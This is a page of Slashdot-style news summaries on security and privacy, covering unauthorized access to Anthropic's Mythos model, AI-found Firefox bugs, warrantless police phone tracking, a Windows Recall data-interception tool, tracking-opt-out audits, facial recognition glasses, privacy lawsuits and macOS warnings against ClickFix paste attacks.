Security

Anthropic's Mythos Model Is Being Accessed by Unauthorized Users (bloomberg.com) 23

Bloomberg reports that a small group of unauthorized users gained access to Anthropic's restricted Mythos model through a mix of contractor-linked access and online sleuthing. Anthropic says it is investigating and has no evidence the access extended beyond a third-party vendor environment or affected its own systems. From the report: The users relied on a mix of tactics to get into Mythos. These included using access the person had as a worker at a third-party contractor for Anthropic and trying commonly used internet sleuthing tools often employed by cybersecurity researchers, the person said. The users are part of a private Discord channel that focuses on hunting for information about unreleased models, including by using bots to scour for details that Anthropic and others have posted on unsecured websites such as GitHub. [...] To access Mythos, the group of users made an educated guess about the model's online location based on knowledge about the format Anthropic has used for other models, the person said, adding that such details were revealed in a recent data breach from Mercor, an AI training startup that works with a number of top developers.

Crucially, the person also has permission to access Anthropic models and software related to evaluating the technology for the startup. They gained this access from a company for which they have performed contract work evaluating Anthropic's AI models. Bloomberg is not naming the company for security reasons. The group is interested in playing around with new models, not wreaking havoc with them, the person said. The group has not run cybersecurity-related prompts on the Mythos model, the person said, preferring instead to try tasks like building simple websites in an attempt to avoid detection by Anthropic. The person said the group also has access to a slew of other unreleased Anthropic AI models.

Firefox

Mozilla Uses Anthropic's Mythos To Fix 271 Bugs In Firefox (nerds.xyz) 151

BrianFagioli writes: Mozilla says it used an early version of Anthropic's Claude Mythos Preview to comb through Firefox's code, and the results were hard to ignore. In Firefox 150, the team fixed 271 vulnerabilities identified during this effort, a number that would have been unthinkable not long ago. Instead of relying only on fuzzing tools or human review, the AI was able to reason through code and surface issues that typically require highly specialized expertise.

The bigger implication is less about one release and more about where this is heading. Security has long favored attackers, since they only need to find a single flaw while defenders have to protect everything. If AI can scale vulnerability discovery for defenders, that dynamic could start to shift. It does not mean zero days disappear overnight, but it suggests a future where bugs are found and fixed faster than attackers can weaponize them.
"Computers were completely incapable of doing this a few months ago, and now they excel at it," says Mozilla in a blog post. "We have many years of experience picking apart the work of the world's best security researchers, and Mythos Preview is every bit as capable. So far we've found no category or complexity of vulnerability that humans can find that this model can't."

The company concluded: "The defects are finite, and we are entering a world where we can finally find them all."
PlayStation (Games)

PlayStation To Require Age Verification For Messages and Voice Chat (insider-gaming.com) 67

A new email from Sony says that PlayStation will require players to verify their age later this year to keep using communication features like messages and voice chat. Insider-Gaming reports: The initiative comes from the goal of providing "safe, age-appropriate experiences for players and families while respecting their privacy" and providing "meaningful control over their gaming experiences." The age-verification process will be implemented globally, and players will need to verify their age to continue using PlayStation communication services, such as messages and voice chat. If the player opts not to verify their age, they can still use other services, such as games, trophies, and the store. Only the communication experience will be affected if you choose not to verify your age. PlayStation didn't provide a date for when players will need to begin the verification process.
United States

Nevada Police Can Now Track Cellphones Without a Warrant (apnews.com) 62

"Nevada quietly signed an agreement earlier this year with a company that collects location data from cellphones, allowing police to track a device virtually in real time," reports the Associated Press. "All without a warrant." The software from Fog Data Science, adopted this January in Nevada through a Department of Public Safety contract, pulls information from smartphone apps in order to let state investigators identify the location of mobile devices. The state is allowed more than 250 queries a month using the tool, which allows officers to track a device's location over long stretches of time and enables them to see what Fog calls "patterns of life," according to company documents from 2022. It can help them deduce where and when people work and live, with whom they associate and what places they visit, according to privacy experts... Traditionally, police must obtain a warrant from a judge to access cellphone location information — a process that can take days or weeks. And while cellphone users may be aware that they are sharing their location through apps such as Google Maps, critics say few are aware that such information can make its way to police...

Other agencies in Nevada have been known to use technology similar to Fog. In 2013, Las Vegas Metropolitan Police Department acquired something known as a cell-site simulator that mimics cellphone towers and can sweep up signals from entire areas to track individuals, with some models capable of intercepting texts and calls. Police have not released detailed information about the technology since then.

"Police in other states have said the technology (and its low price tag) has helped expand investigatory capacity," the article adds.

But it also points out that Fog Data Science has a web page letting individuals opt out of all their data sets.
Privacy

US Congress Fails to Pass Long-Term FISA Extension, Authorizes It Through April 30 (cnn.com) 41

Yesterday the U.S. Congress approved "a short-term extension" of a FISA law that allows wiretaps without a warrant for surveilling foreign targets, reports CNN — but only until April 30. Republican congressional leaders had sought an 18-month extension, but "failed to secure" the votes after "clamoring from some of their members for reforms to protect Americans' privacy." The warrantless surveillance law, known as Section 702 of the Foreign Intelligence Surveillance Act, was set to expire on Monday night. Members are hoping the additional time will allow them to come to agreement without ending authorization for the intelligence gathering program, which permits US officials to monitor phone calls and text messages from foreign targets... There was an hour of suspense in the Senate Friday morning when it appeared possible that Democratic Sen. Ron Wyden, a longtime critic of FISA 702, might block the House-passed extension. But ultimately, he said his House colleagues had assured him "this short-term extension makes reform more likely, and expiration makes reform less likely," and so he chose not to object....

House Republican leaders believed Thursday night they had struck a deal with conservative holdouts who harbor deep and longstanding concerns that a key piece of the law infringes on Americans' privacy rights. But in a pair of after-midnight votes, more than a dozen rank-and-file Republicans rejected the long-term reauthorization plan on the floor, which was the result of days of tense negotiations among leadership, lawmakers and the White House.

The law allows authorized US officials to gather phone calls and text messages of foreign targets, but they can also incidentally collect the data of Americans in the process. Senior national security officials have for years said the law is critical for thwarting terror attacks, stemming the flow of fentanyl into the US and stopping ransomware attacks on critical infrastructure. Civil liberties groups on the left and the right, meanwhile, argue the surveillance authority risks infringing on Americans' privacy.

Privacy

Shuttered Startups Are Selling Old Slack Chats, Emails To AI Companies 41

Some failed startups are reportedly selling old Slack messages, emails, and other internal records to AI companies as training data, creating a new way to cash out after shutting down. Fast Company reports: Shanna Johnson, the CEO of now-defunct software company Cielo24, told the publication that she was able to sell every Slack message, internal email, and Jira ticket as training data for "hundreds of thousands of dollars."

This isn't a one-off scenario. SimpleClosure, a startup that helps companies like Cielo24 shut down, told Forbes that there's been major interest from AI companies trying to get their hands on workplace data. Because of this, SimpleClosure launched a new tool that allows companies to sell their wealth of internal communications -- from Slack archives to email chains -- to AI labs. The company said it's processed 100 such deals in the past year. Payouts ranged from $10,000 to $100,000.
"I think the privacy issues here are quite substantial," Marc Rotenberg, founder of the Center for AI and Digital Policy, told Forbes. "Employee privacy remains a key concern, particularly because people have become so dependent on these new internal messaging tools like Slack. ... It's not generic data. It's identifiable people."
Privacy

'TotalRecall Reloaded' Tool Finds a Side Entrance To Windows 11 Recall Database (arstechnica.com) 29

An anonymous reader quotes a report from Ars Technica: Two years ago, Microsoft launched its first wave of "Copilot+" Windows PCs with a handful of exclusive features that could take advantage of the neural processing unit (NPU) hardware being built into newer laptop processors. These NPUs could enable AI and machine learning features that could run locally rather than in someone's cloud, theoretically enhancing security and privacy. One of the first Copilot+ features was Recall, a feature that promised to track all your PC usage via screenshot to help you remember your past activity. But as originally implemented, Recall was neither private nor secure; the feature stored its screenshots plus a giant database of all user activity in totally unencrypted files on the user's disk, making it trivial for anyone with remote or local access to grab days, weeks, or even months of sensitive data, depending on the age of the user's Recall database.

After journalists and security researchers discovered and detailed these flaws, Microsoft delayed the Recall rollout by almost a year and substantially overhauled its security. All locally stored data would now be encrypted and viewable only with Windows Hello authentication; the feature now did a better job detecting and excluding sensitive information, including financial information, from its database; and Recall would be turned off by default, rather than enabled on every PC that supported it. The reconstituted Recall was a big improvement, but having a feature that records the vast majority of your PC usage is still a security and privacy risk. Security researcher Alexander Hagenah was the author of the original "TotalRecall" tool that made it trivially simple to grab the Recall information on any Windows PC, and an updated "TotalRecall Reloaded" version exposes what Hagenah believes are additional vulnerabilities.

The problem, as detailed by Hagenah on the TotalRecall GitHub page, isn't with the security around the Recall database, which he calls "rock solid." The problem is that, once the user has authenticated, the system passes Recall data to another system process called AIXHost.exe, and that process doesn't benefit from the same security protections as the rest of Recall. "The vault is solid," Hagenah writes. "The delivery truck is not." The TotalRecall Reloaded tool uses an executable file to inject a DLL file into AIXHost.exe, something that can be done without administrator privileges. It then waits in the background for the user to open Recall and authenticate using Windows Hello. Once this is done, the tool can intercept screenshots, OCR'd text, and other metadata that Recall sends to the AIXHost.exe process, which can continue even after the user closes their Recall session.

"The VBS enclave won't decrypt anything without Windows Hello," Hagenah writes. "The tool doesn't bypass that. It makes the user do it, silently rides along when the user does it, or waits for the user to do it." A handful of tasks, including grabbing the most recent Recall screenshot, capturing select metadata about the Recall database, and deleting the user's entire Recall database, can be done with no Windows Hello authentication. Once authenticated, Hagenah says the TotalRecall Reloaded tool can access both new information recorded to the Recall database as well as data Recall has previously recorded.
"We appreciate Alexander Hagenah for identifying and responsibly reporting this issue. After careful investigation, we determined that the access patterns demonstrated are consistent with intended protections and existing controls, and do not represent a bypass of a security boundary or unauthorized access to data," a Microsoft spokesperson told Ars. "The authorization period has a timeout and anti-hammering protection that limit the impact of malicious queries."
The Internet

Audit Finds Google, Microsoft, and Meta Still Tracking Users After Opt-Out (404media.co) 48

alternative_right shares a report from 404 Media: An independent privacy audit of Microsoft, Meta, and Google web traffic in California found that the companies may be violating state regulations and racking up billions in fines. According to the audit from privacy search engine webXray, 55 percent of the sites it checked set ad cookies in a user's browser even if they opted out of tracking. Each company disputed or took issue with the research, with Google saying it was based on a "fundamental misunderstanding" of how its product works.

The webXray California Privacy Audit viewed web traffic on more than 7,000 popular websites in California in the month of March and found that most tech companies ignore when a user asks to opt-out of cookie tracking. California has stringent and well defined privacy legislation thanks to its California Consumer Privacy Act (CCPA) which allows users to, among other things, opt out of the sale of their personal information. There's a system called Global Privacy Control (GPC), which includes a browser extension that indicates to a website when a user wants to opt out of tracking.

According to the webXray audit, Google failed to let users opt out 87 percent of the time. "Google's failure to honor the GPC opt-out signal is easy to find in network traffic. When a browser using GPC connects to Google's servers it encodes the opt-out signal by sending the code 'sec-gpc: 1.' This means Google should not return cookies," the audit said. "However, when Google's server responds to the network request with the opt-out it explicitly responds with a command to create an advertising cookie named IDE using the 'set-cookie' command. This non-compliance is easy to spot, hiding in plain sight."

The audit said that Microsoft fails to opt out users in the same way and has a failure rate of 50 percent in the web traffic webXray viewed. Meta's failure rate was 69 percent and a bit more comprehensive. "Meta instructs publishers to install the following tracking code on their websites. The code contains no check for globally standard opt-out signals -- it loads unconditionally, fires a tracking event, and sets a cookie regardless of the consumer's privacy preferences," the audit said. It showed a copy of Meta's tracking data which contains no GPC check at all.

Privacy

Meta Is Warned That Facial Recognition Glasses Will Arm Sexual Predators (wired.com) 90

An anonymous reader quotes a report from Wired: More than 70 civil liberties, domestic violence, reproductive rights, LGBTQ+, labor, and immigrant advocacy organizations are demanding that Meta abandon plans to deploy face recognition on its Ray-Ban and Oakley smart glasses, warning that the feature -- reportedly known inside the company as "Name Tag" -- would hand stalkers, abusers, and federal agents the ability to silently identify strangers in public. The coalition, which includes the ACLU, the Electronic Privacy Information Center, Fight for the Future, Access Now, and the Leadership Conference on Civil and Human Rights, is demanding Meta kill the feature before launch, after internal documents surfaced showing the company hoped to use the current "dynamic political environment" as cover for the rollout, betting that civil society groups would have their resources "focused on other concerns."

Name Tag, as revealed in February by The New York Times, would work through the artificial intelligence assistant built into Meta's smart glasses, allowing wearers to pull up information about people in their field of view. Engineers have reportedly been weighing two versions of the feature: one that would only identify people the wearer is already connected to on a Meta platform, and a broader version that could recognize anyone with a public account on a Meta service such as Instagram. The coalition wants Meta to scrap the feature entirely. In a letter to CEO Mark Zuckerberg on Monday, it argues that face recognition in inconspicuous consumer eyewear "cannot be resolved through product design changes, opt-out mechanisms, or incremental safeguards." Bystanders in public have no meaningful way to consent to being identified, it says.

Meta is also urged to disclose any known instances of its wearables being used in stalking, harassment, or domestic violence cases; disclose any past or ongoing discussions with federal law enforcement agencies, including Immigration and Customs Enforcement and Customs and Border Protection, about the use of Meta wearables or data from them; and commit to consulting civil society and independent privacy experts before integrating biometric identification into any consumer device. "People should be able to move through their daily lives without fear that stalkers, scammers, abusers, federal agents, and activists across the political spectrum are silently and invisibly verifying their identities and potentially matching their names to a wealth of readily available data about their habits, hobbies, relationships, health, and behaviors," write the groups, which also include Common Cause, Jane Doe Inc., UltraViolet, the National Organization for Women, the New York State Coalition Against Domestic Violence, the Library Freedom Project, and Old Dykes Against Billionaire Tech Bros, among others.

AI

Californians Sue Over AI Tool That Records Doctor Visits (arstechnica.com) 34

An anonymous reader quotes a report from Ars Technica: Several Californians sued Sutter Health and MemorialCare this week over allegations that an AI transcription tool was used to record them without their consent, in violation of state and federal law. The proposed class-action lawsuit, filed on Wednesday in federal court in San Francisco, states that, within the past six months, the plaintiffs received medical care at various Sutter and MemorialCare facilities.

During those visits, medical staff used Abridge AI. According to the complaint, this system "captured and processed their confidential physician-patient communications. Plaintiffs did not receive clear notice that their medical conversations would be recorded by an artificial intelligence platform, transmitted outside the clinical setting, or processed through third-party systems." The complaint adds that these recordings "contained individually identifiable medical information, including but not limited to medical histories, symptoms, diagnoses, medications, treatment discussions, and other sensitive health disclosures communicated during confidential medical consultations."

In recent years, Abridge's software and AI service have been rapidly deployed across major health care providers nationwide, including Kaiser Permanente, the Mayo Clinic, Duke Health, and many more. When activated, the software captures, transcribes, and summarizes conversations between patients and doctors, and it turns them into clinical notes. Sutter Health began partnering with Abridge two years ago. Sutter spokesperson Liz Madison said the company is aware of the lawsuit. "We take patient privacy seriously and are committed to protecting the security of our patients' information," Madison said. "Technology used in our clinical settings is carefully evaluated and implemented in accordance with applicable laws and regulations."

EU

EU Parliament Fails To Renew Loophole Allowing Tech Firms To Report Abuse (theguardian.com) 17

Bruce66423 shares a report from the Guardian: The European parliament has blocked the extension of a law that permits big tech firms to scan for child sexual exploitation on their platforms, creating a legal gap that child safety experts say will lead to crimes going undetected. The law, which was a carve-out of the EU Privacy Act, was put in place in 2021 as a temporary measure allowing companies to use automated detection technologies to scan messages for harms, including child sexual abuse material (CSAM), grooming and sextortion. However, it expired on April 3, and the EU parliament decided not to vote to extend it, amid privacy concerns from some lawmakers.

The regulatory gap has created uncertainty for big tech companies, because while scanning for harms on their platforms is now illegal, they still remain liable to remove any illegal content hosted on their platforms under a different law, the Digital Services Act. Google, Meta, Snap and Microsoft said they would continue to voluntarily scan their platforms for CSAM, in a joint statement posted on a Google blog.
Bruce66423 adds: "Child abuse as the excuse for avoiding privacy protections. Who would have thought it?"
Encryption

Google Rolls Out Gmail End-To-End Encryption On Mobile Devices (bleepingcomputer.com) 27

Gmail's end-to-end encryption is now available on all Android and iOS devices, letting enterprise users send and read encrypted emails directly in the app without any extra tools. "This launch combines the highest level of privacy and data encryption with a user-friendly experience for all users, enabling simple encrypted email for all customers from small businesses to enterprises and public sector," Google announced in a blog post. BleepingComputer reports: Starting this week, encrypted messages will be delivered as regular emails to Gmail recipients' inboxes if they use the Gmail app. Recipients who don't have the Gmail mobile app and use other email services can read them in a web browser, regardless of the device and service they're using.

[...] This feature is now available for all client-side encryption (CSE) users with Enterprise Plus licenses and the Assured Controls or Assured Controls Plus add-on after admins enable the Android and iOS clients in the CSE admin interface via the Admin Console. Gmail's end-to-end encryption (E2EE) feature is powered by the client-side encryption (CSE) technical control, which allows Google Workspace organizations to use encryption keys they control and are stored outside Google's servers to protect sensitive documents and emails.

Bitcoin

NYT Claims Adam Back Is Bitcoin Creator Satoshi Nakamoto (nytimes.com) 85

A New York Times investigation by John Carreyrou claims a British cryptographer named Adam Back is the strongest circumstantial candidate yet for being Satoshi Nakamoto. The report citing overlaps in writing style, ideology, technical background, and old posts that outlined key parts of Bitcoin years before its launch. Carreyrou is a renowned investigative journalist and author, best known for exposing the massive fraud at Theranos while at the Wall Street Journal. Here's an excerpt from the report: ... As anyone steeped in Bitcoin lore will tell you, Satoshi was a master at the art of maintaining anonymity on the internet, leaving few, if any, digital footprints behind. But Satoshi did leave behind a corpus of texts, including a nine-page white paper (PDF) outlining his invention and his many posts on the Bitcointalk forum, an online message board where users gathered to discuss the digital currency's software, economics and philosophy. And that corpus, it turned out, had expanded significantly during the impostor's civil trial when Martti Malmi, a Finnish programmer who collaborated with Satoshi in Bitcoin's early days, released a trove of hundreds of emails he had exchanged with him. Emails Satoshi sent to other early Bitcoin adopters had surfaced before, but none came close in volume to the Malmi dump. If Satoshi was ever going to be found, I was convinced the key lay somewhere in these texts.

Then again, others must have gone down this road before me. Journalists, academics and internet sleuths had been trying to identify Satoshi for 16 years. During that span, more than 100 names had been put forward, including those of an Irish cryptography student, an unemployed Japanese American engineer, a South African criminal mastermind and the mathematician portrayed in the movie "A Beautiful Mind." The most alluring theories had focused on coincidences that aligned with what little was known about Satoshi: a particular code-writing style, a mysterious work history, an expertise in Bitcoin's key technical concepts, an anti-government worldview. But they had run aground under the weight of an alibi or some other piece of inconsistent or contrary evidence. Each failure had been met with glee by many members of the Bitcoin community. As they liked to point out, only Satoshi could definitively prove his identity by moving some of his coins. Any evidence short of that would be circumstantial.

It seemed foolish to think that I could somehow crack a case that had confounded so many others. But I craved the thrill of a big, challenging story. So I decided to try once more to unmask Bitcoin's mysterious creator.
Back, for his part, denies being Satoshi, writing in a post on X: "i'm not satoshi, but I was early in laser focus on the positive societal implications of cryptography, online privacy and electronic cash, hence my ~1992 onwards active interest in applied research on ecash, privacy tech on cypherpunks list which led to hashcash and other ideas."
Privacy

LinkedIn Faces Spying Allegations Over Browser Extension Scanning (pcmag.com) 70

LinkedIn is facing allegations that it quietly scans users' browsers for installed Chrome extensions. The German group Fairlinked e.V. goes so far as to claim that the site is "running one of the largest corporate espionage operations in modern history."

"The program runs silently, without any visible indicator to the user," the group says. "It does not ask for consent. It does not disclose what it is doing. It reports the results to LinkedIn's servers. This is not a one-time check. The scan runs on every page load, for every visitor." PCMag reports: This browser extension "fingerprinting" technique has been spotted before, but it was previously found to probe only 2,000 to 3,000 extensions. Fairlinked alleges that LinkedIn is now scanning for 6,222 extensions that could indicate a user's political opinions or religious views. For example, the extensions LinkedIn will look for include one that flags companies as too "woke," one that can add an "anti-Zionist" tag to LinkedIn profiles, and two others that can block content forbidden under Islamic teachings.

It would also be a cakewalk to tie the collected extension data to specific users, since LinkedIn operates as a vast professional social network that covers people's work history. Fairlinked's concern is that Microsoft and LinkedIn can allegedly use the data to identify which companies use competing products. "LinkedIn has already sent enforcement threats to users of third-party tools, using data obtained through this covert scanning to identify its targets," the group claims. However, LinkedIn claims that Fairlinked mischaracterizes a LinkedIn safeguard designed to prevent web scraping by browser extensions. "We do not use this data to infer sensitive information about members," the company says. "To protect the privacy of our members, their data, and to ensure site stability, we do look for extensions that scrape data without members' consent or otherwise violate LinkedIn's Terms of Service," LinkedIn adds.

[...] The statement goes on to allege that Fairlinked is from a developer whose account was previously suspended for web scraping. One of the group's board members is listed as "S.Morell," which appears to be Steven Morell, the founder of Teamfluence, a tool that helps businesses monitor LinkedIn activity. [...] Still, the Microsoft-owned site is facing some blowback for not clearly disclosing the browser extension scanning in LinkedIn's privacy policy. Fairlinked is soliciting donations for a legal fund to take on Microsoft and is urging the public to encourage local regulators to intervene.

The Internet

Fan Fiction Website AO3 Exits Beta After 17 Years 3

Archive of Our Own (AO3) is officially dropping its "beta" label after 17 years. The Organization for Transformative Works, the nonprofit behind the fanfiction site, said the site will keep evolving with new improvements even though it's no longer technically in beta.

"As the AO3 software has been stable for a long time, the change is mostly cosmetic and does not indicate that everything is finalized or perfectly working," the organizations says. "Exiting beta doesn't mean we'll stop continuing to improve AO3 -- our volunteer coders and community contributors will still be working to add to and improve AO3 every day."

Some of the features it's introduced over the years include a tag system, offline fanworks downloads, privacy settings that let creators restrict access to their work, and new modes for multi-chapter works. As it stands, the site says it has more than 10 million registered users and 17 million fanworks.
The Courts

Perplexity's 'Incognito Mode' Is a 'Sham,' Lawsuit Says 5

An anonymous reader quotes a report from Ars Technica: Perplexity's AI search engine encourages users to go deeper with their prompts by engaging in chat sessions that a lawsuit has alleged are often shared in their entirety with Google and Meta without users' knowledge or consent. "This happened to every user regardless of whether or not they signed up for a Perplexity account," the lawsuit alleged, while stressing that "enormous volumes of sensitive information from both subscribed and non-subscribed users" are shared.

Using developer tools, the lawsuit found that opening prompts are always shared, as are any follow-up questions the search engine asks that a user clicks on. Privacy concerns are seemingly worse for non-subscribed users, the complaint alleged. Their initial prompts are shared with "a URL through which the entire conversation may be accessed by third parties like Meta and Google." Disturbingly, the lawsuit alleged, chats are also shared with personally identifiable information (PII), even when users who want to stay anonymous opt to use Perplexity's "Incognito Mode." That mode, the lawsuit charged, is a "sham."

"'Incognito' mode does nothing to protect users from having their conversations shared with Meta and Google," the complaint said. "Even paid users who turned on the 'Incognito' feature still had their conversations shared with Meta and Google, along with their email addresses and other identifiers that allowed Meta and Google to personally identify them."
"Perplexity's failure to inform its users that their personal information has been disclosed to Meta and Google or to take any steps to halt the continued disclosure of users' information is malicious, oppressive, and in reckless disregard" of users' rights, the lawsuit alleged.

"Nothing on Perplexity's website warns users that their conversations with its AI Machine will be shared with Meta and Google," Doe alleged. "Much less does Perplexity warn subscribed users that its 'Incognito Mode' does not function to protect users' private conversations from disclosure to companies like Meta and Google."
The Internet

Cloudflare Announces EmDash As Open-Source 'Spiritual Successor' To WordPress (phoronix.com) 41

In classic Cloudflare fashion, the CDN provider used April Fool's Day to unveil an actual, "not a joke" product. Today, the company announced EmDash -- an open-source "spiritual successor" to WordPress that aims to solve plugin security. Phoronix reports: With the help of AI coding agents, Cloudflare engineers have been rebuilding the WordPress open-source project "from the ground up." EmDash is written entirely in TypeScript and is a server-less design. Making plug-ins more secure than the WordPress architecture, EmDash plug-ins are sandboxed and run in their own isolate. EmDash builds upon the Astro web framework. EmDash doesn't rely on any WordPress code but is designed to be compatible with WordPress functionality. EmDash is open-source now under the MIT license. The EmDash code is available on GitHub.
The Courts

OkCupid Settles FTC Case On Alleged Misuse of Its Users' Personal Data (engadget.com) 11

OkCupid and parent company Match Group settled an FTC case dating back to 2014 over allegations that the dating app shared users' photos and other personal data with a third party without proper disclosure or opt-out rights. Engadget reports: According to the FTC, OkCupid's privacy policy at the time noted that the company wouldn't share a user's personal information with others, except for some cases including "service providers, business partners, other entities within its family of businesses." However, the lawsuit accused OkCupid of sharing three million photos of its users to Clarifai, which the FTC claims is a "unrelated third party" that didn't fall under the allowed entities. On top of that, the lawsuit alleged that OkCupid didn't inform its users of this data sharing, nor give them a chance to opt out.

Moving forward, the settlement would "permanently prohibit" Match Group, which owns OkCupid, and Humor Rainbow, which operates OkCupid, from misrepresenting what kind of personal information it collects, the purpose for collecting the data and any consumer choices to prevent data collection. Even after the 2014 incident, OkCupid was found with security flaws that could've exposed user account info but, which were quickly patched in 2020.

Social Networks

Will Social Media Change After YouTube and Meta's Court Defeat? (theverge.com) 54

Yes, this week YouTube and Meta were found negligent in a landmark case about social media addiction.

But "it's still far from certain what this defeat will change," argues The Verge's senior tech and policy editor, "and what the collateral damage could be." If these decisions survive appeal — which isn't certain — the direct outcome would be multimillion-dollar penalties. Depending on the outcome of several more "bellwether" cases in Los Angeles, a much larger group settlement could be reached down the road... For many activists, the overall goal is to make clear that lawsuits will keep piling up if companies don't change their business practices...

The best-case outcome of all this has been laid out by people like Julie Angwin, who wrote in The New York Times that companies should be pushed to change "toxic" features like infinite scrolling, beauty filters that encourage body dysmorphia, and algorithms that prioritize "shocking and crude" content. The worst-case scenario falls along the lines of a piece from Mike Masnick at Techdirt, who argued the rulings spell disaster for smaller social networks that could be sued for letting users post and see First Amendment-protected speech under a vague standard of harm. He noted that the New Mexico case hinged partly on arguing that Meta had harmed kids by providing end-to-end encryption in private messaging, creating an incentive to discontinue a feature that protects users' privacy — and indeed, Meta discontinued end-to-end encryption on Instagram earlier this month.

Blake Reid, a professor at Colorado Law, is more circumspect. "It's hard right now to forecast what's going to happen," Reid told The Verge in an interview. On Bluesky, he noted that companies will likely look for "cold, calculated" ways to avoid legal liability with the minimum possible disruption, not fundamentally rethink their business models. "There are obviously harms here and it's pretty important that the tort system clocked those harms" in the recent cases, he told The Verge. "It's just that what comes in the wake of them is less clear to me".

The article also includes this prediction from legal blogger/Section 230 export Eric Goldman. "There will be even stronger pushes to restrict or ban children from social media." Goldman argues "This hurts many subpopulations of minors, ranging from LGBTQ teens who will be isolated from communities that can help them navigate their identities to minors on the autism spectrum who can express themselves better online than they can in face-to-face conversations."
Desktops (Apple)

MacOS 26.4 Adds Warnings For ClickFix Attacks to Its Terminal App (macrumors.com) 66

An anonymous Slashdot reader writes: ClickFix attacks are ramping up. These attacks have users copy and paste a string to something that can execute a command line — like the Windows Run dialog, or a shell prompt.

But MacRumors reports that macOS 26.4 Tahoe (updated earlier this week) introduces a new feature to its Terminal app where it will detect ClickFix attempts and stop them by prompting the user if they really wanted to run those commands.

According to MacRumors, the warning readers "Possible malware, Paste blocked."

"Your Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy...."

There is also a "Paste Anyway" option if users still wish to proceed.

Slashdot Top Deals